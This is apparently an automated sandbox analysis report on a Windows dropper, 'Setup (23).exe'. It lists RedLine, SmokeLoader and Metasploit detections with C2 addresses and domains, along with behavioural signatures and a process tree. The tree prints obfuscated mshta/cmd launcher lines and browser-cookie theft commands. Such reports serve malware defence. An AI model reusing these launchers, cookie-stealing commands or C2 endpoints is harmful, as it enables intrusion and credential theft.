Resubmissions
15-10-2024 15:36
241015-s1zlzasdkc 1001-07-2024 18:32
240701-w6yteawhmq 1001-07-2024 14:52
240701-r82wmaxdnd 1001-07-2024 14:52
240701-r8syqa1dpp 1011-03-2024 21:22
240311-z8dsssgg58 1001-09-2021 13:18
210901-5bmxjspa5s 1001-09-2021 13:04
210901-te4btfspqa 1001-09-2021 05:12
210901-4wnkwm1p3j 1031-08-2021 21:47
210831-41rp97dma2 1031-08-2021 19:51
210831-359awwatje 10Analysis
-
max time kernel
177s -
max time network
1806s -
platform
windows11_x64 -
resource
win11 -
submitted
22-08-2021 21:19
General
-
Target
Setup (23).exe
-
Size
631KB
-
MD5
cb927513ff8ebff4dd52a47f7e42f934
-
SHA1
0de47c02a8adc4940a6c18621b4e4a619641d029
-
SHA256
fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f
-
SHA512
988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c
Score
10/10
Malware Config
Extracted
Family
redline
Botnet
v1
C2
195.2.78.163:25450
Extracted
Family
smokeloader
Version
2020
C2
http://readinglistforaugust1.xyz/
http://readinglistforaugust2.xyz/
http://readinglistforaugust3.xyz/
http://readinglistforaugust4.xyz/
http://readinglistforaugust5.xyz/
http://readinglistforaugust6.xyz/
http://readinglistforaugust7.xyz/
http://readinglistforaugust8.xyz/
http://readinglistforaugust9.xyz/
http://readinglistforaugust10.xyz/
http://readinglistforaugust1.site/
http://readinglistforaugust2.site/
http://readinglistforaugust3.site/
http://readinglistforaugust4.site/
http://readinglistforaugust5.site/
http://readinglistforaugust6.site/
http://readinglistforaugust7.site/
http://readinglistforaugust8.site/
http://readinglistforaugust9.site/
http://readinglistforaugust10.site/
rc4.i32
rc4.i32
Extracted
Family
metasploit
Version
windows/single_exec
Signatures
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba Payload 1 IoCs
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Process spawned unexpected child process 10 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 8 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Suspicious use of NtCreateProcessExOtherParentProcess 27 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
-
Blocklisted process makes network request 63 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
-
Executes dropped EXE 64 IoCs
-
Checks BIOS information in registry 2 TTPs 18 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Loads dropped DLL 34 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 14 IoCs
Detects Themida, an advanced Windows software protection system.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 10 IoCs
-
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 12 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
-
Suspicious use of SetThreadContext 9 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 5 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 28 IoCs
-
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 2 IoCs
-
Enumerates system info in registry 2 TTPs 34 IoCs
-
Kills process with taskkill 3 IoCs
-
Modifies data under HKEY_USERS 43 IoCs
-
Modifies registry class 4 IoCs
-
Modifies system certificate store 2 TTPs 16 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Script User-Agent 7 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: MapViewOfSection 2 IoCs
-
Suspicious behavior: SetClipboardViewer 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 6 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of UnmapMainImage 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup (23).exe"C:\Users\Admin\AppData\Local\Temp\Setup (23).exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Documents\R48SBawdw4kU2e3s24vQ9vKp.exe"C:\Users\Admin\Documents\R48SBawdw4kU2e3s24vQ9vKp.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\5117462.exe"C:\Users\Admin\AppData\Roaming\5117462.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3240 -s 23724⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\AppData\Roaming\4314784.exe"C:\Users\Admin\AppData\Roaming\4314784.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Roaming\1698112.exe"C:\Users\Admin\AppData\Roaming\1698112.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3124 -s 24324⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\AppData\Roaming\4567926.exe"C:\Users\Admin\AppData\Roaming\4567926.exe"3⤵
-
-
-
C:\Users\Admin\Documents\jzqLRNKxsW5y58WxDLJ15wdL.exe"C:\Users\Admin\Documents\jzqLRNKxsW5y58WxDLJ15wdL.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Documents\tBuxxjdx3FQngk1Pt0BNUH5Y.exe"C:\Users\Admin\Documents\tBuxxjdx3FQngk1Pt0BNUH5Y.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Documents\X2VZ3V4dBmqHAwXxyoKf7wry.exe"C:\Users\Admin\Documents\X2VZ3V4dBmqHAwXxyoKf7wry.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\X2VZ3V4dBmqHAwXxyoKf7wry.exeC:\Users\Admin\Documents\X2VZ3V4dBmqHAwXxyoKf7wry.exe3⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\Documents\59PPof2gccanlUMVoef7W08y.exe"C:\Users\Admin\Documents\59PPof2gccanlUMVoef7W08y.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\59PPof2gccanlUMVoef7W08y.exe"C:\Users\Admin\Documents\59PPof2gccanlUMVoef7W08y.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Users\Admin\Documents\aJMLnmQHOOAbNwuvxX0WFUlP.exe"C:\Users\Admin\Documents\aJMLnmQHOOAbNwuvxX0WFUlP.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Documents\cpYpXTmmGiVSfBxcmE4nmCJO.exe"C:\Users\Admin\Documents\cpYpXTmmGiVSfBxcmE4nmCJO.exe"2⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
-
C:\Program Files (x86)\Company\NewProduct\customer3.exe"C:\Program Files (x86)\Company\NewProduct\customer3.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"3⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\Documents\vZ7m4fFMAptpY0KjscLQSAaS.exe"C:\Users\Admin\Documents\vZ7m4fFMAptpY0KjscLQSAaS.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\vZ7m4fFMAptpY0KjscLQSAaS.exe"C:\Users\Admin\Documents\vZ7m4fFMAptpY0KjscLQSAaS.exe"3⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\Documents\6S8PC6C5tJoFcljGQp9kreGW.exe"C:\Users\Admin\Documents\6S8PC6C5tJoFcljGQp9kreGW.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1452 -s 2763⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\pUCb0lk9nvctQdKX6B8_P_YK.exe"C:\Users\Admin\Documents\pUCb0lk9nvctQdKX6B8_P_YK.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\bAucNMKwZIo8Up8zd6J7f86P.exe"C:\Users\Admin\Documents\bAucNMKwZIo8Up8zd6J7f86P.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Documents\8gCtyzKiuV26HitQGRIDgMky.exe"C:\Users\Admin\Documents\8gCtyzKiuV26HitQGRIDgMky.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\WR_xJSW9pvYhMRpqACQX849F.exe"C:\Users\Admin\Documents\WR_xJSW9pvYhMRpqACQX849F.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\WR_xJSW9pvYhMRpqACQX849F.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\WR_xJSW9pvYhMRpqACQX849F.exe"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\WR_xJSW9pvYhMRpqACQX849F.exe" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" == "" for %A In ("C:\Users\Admin\Documents\WR_xJSW9pvYhMRpqACQX849F.exe" ) do taskkill -f -iM "%~NxA"4⤵
-
C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXEhbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " == "" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"7⤵
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a6⤵
- Loads dropped DLL
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "WR_xJSW9pvYhMRpqACQX849F.exe"5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
C:\Users\Admin\Documents\Puh3U9f2ULtxULhWwIAxCX_P.exe"C:\Users\Admin\Documents\Puh3U9f2ULtxULhWwIAxCX_P.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1184 -s 2963⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\Documents\pDbDdByF6aR9utbBIMUNEMte.exe"C:\Users\Admin\Documents\pDbDdByF6aR9utbBIMUNEMte.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\pDbDdByF6aR9utbBIMUNEMte.exeC:\Users\Admin\Documents\pDbDdByF6aR9utbBIMUNEMte.exe3⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\Documents\y3G80bY_xpeZZELV7e5mVaeo.exe"C:\Users\Admin\Documents\y3G80bY_xpeZZELV7e5mVaeo.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\9OAqGXBQoEIoTFvnhCrrS_8K.exe"C:\Users\Admin\Documents\9OAqGXBQoEIoTFvnhCrrS_8K.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\dRr5YCEL2pEwYSdyHRVBS24P.exe"C:\Users\Admin\Documents\dRr5YCEL2pEwYSdyHRVBS24P.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 792 -s 3163⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\Documents\KCOEHHIHCUwtCpbiqGKi6IN7.exe"C:\Users\Admin\Documents\KCOEHHIHCUwtCpbiqGKi6IN7.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\KCOEHHIHCUwtCpbiqGKi6IN7.exeC:\Users\Admin\Documents\KCOEHHIHCUwtCpbiqGKi6IN7.exe3⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
-
-
C:\Users\Admin\Documents\nwNWAGGe6qABLrLg77MXYuML.exe"C:\Users\Admin\Documents\nwNWAGGe6qABLrLg77MXYuML.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 960 -s 2923⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\Documents\7cKS46ic5W_306jW2SkqNqpe.exe"C:\Users\Admin\Documents\7cKS46ic5W_306jW2SkqNqpe.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Documents\GgR9orYdkoaFoTnYbO8e9_1e.exe"C:\Users\Admin\Documents\GgR9orYdkoaFoTnYbO8e9_1e.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\GgR9orYdkoaFoTnYbO8e9_1e.exe"C:\Users\Admin\Documents\GgR9orYdkoaFoTnYbO8e9_1e.exe" -q3⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\Documents\CvQGavEp4ZKX4jPB6ErPbq71.exe"C:\Users\Admin\Documents\CvQGavEp4ZKX4jPB6ErPbq71.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\es5ovX9j2BEakidcJiPB_DUG.exe"C:\Users\Admin\Documents\es5ovX9j2BEakidcJiPB_DUG.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3972 -s 2563⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\Documents\EDoeZ1vpsO0rSv93ax3a75Zn.exe"C:\Users\Admin\Documents\EDoeZ1vpsO0rSv93ax3a75Zn.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\QskiAnEpGnt8O2yQkwAjT6FB.exe"C:\Users\Admin\Documents\QskiAnEpGnt8O2yQkwAjT6FB.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-NRH69.tmp\QskiAnEpGnt8O2yQkwAjT6FB.tmp"C:\Users\Admin\AppData\Local\Temp\is-NRH69.tmp\QskiAnEpGnt8O2yQkwAjT6FB.tmp" /SL5="$202BC,138429,56832,C:\Users\Admin\Documents\QskiAnEpGnt8O2yQkwAjT6FB.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-SGG04.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-SGG04.tmp\Setup.exe" /Verysilent4⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2464 -s 2966⤵
- Program crash
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet5⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629407961 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"6⤵
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-GHPPK.tmp\WEATHER Manager.tmp"C:\Users\Admin\AppData\Local\Temp\is-GHPPK.tmp\WEATHER Manager.tmp" /SL5="$1036A,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent6⤵
-
C:\Users\Admin\AppData\Local\Temp\is-QHHCF.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-QHHCF.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=7157⤵
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-QHHCF.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-QHHCF.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629407961 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"8⤵
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2920 -s 18886⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"5⤵
- Executes dropped EXE
-
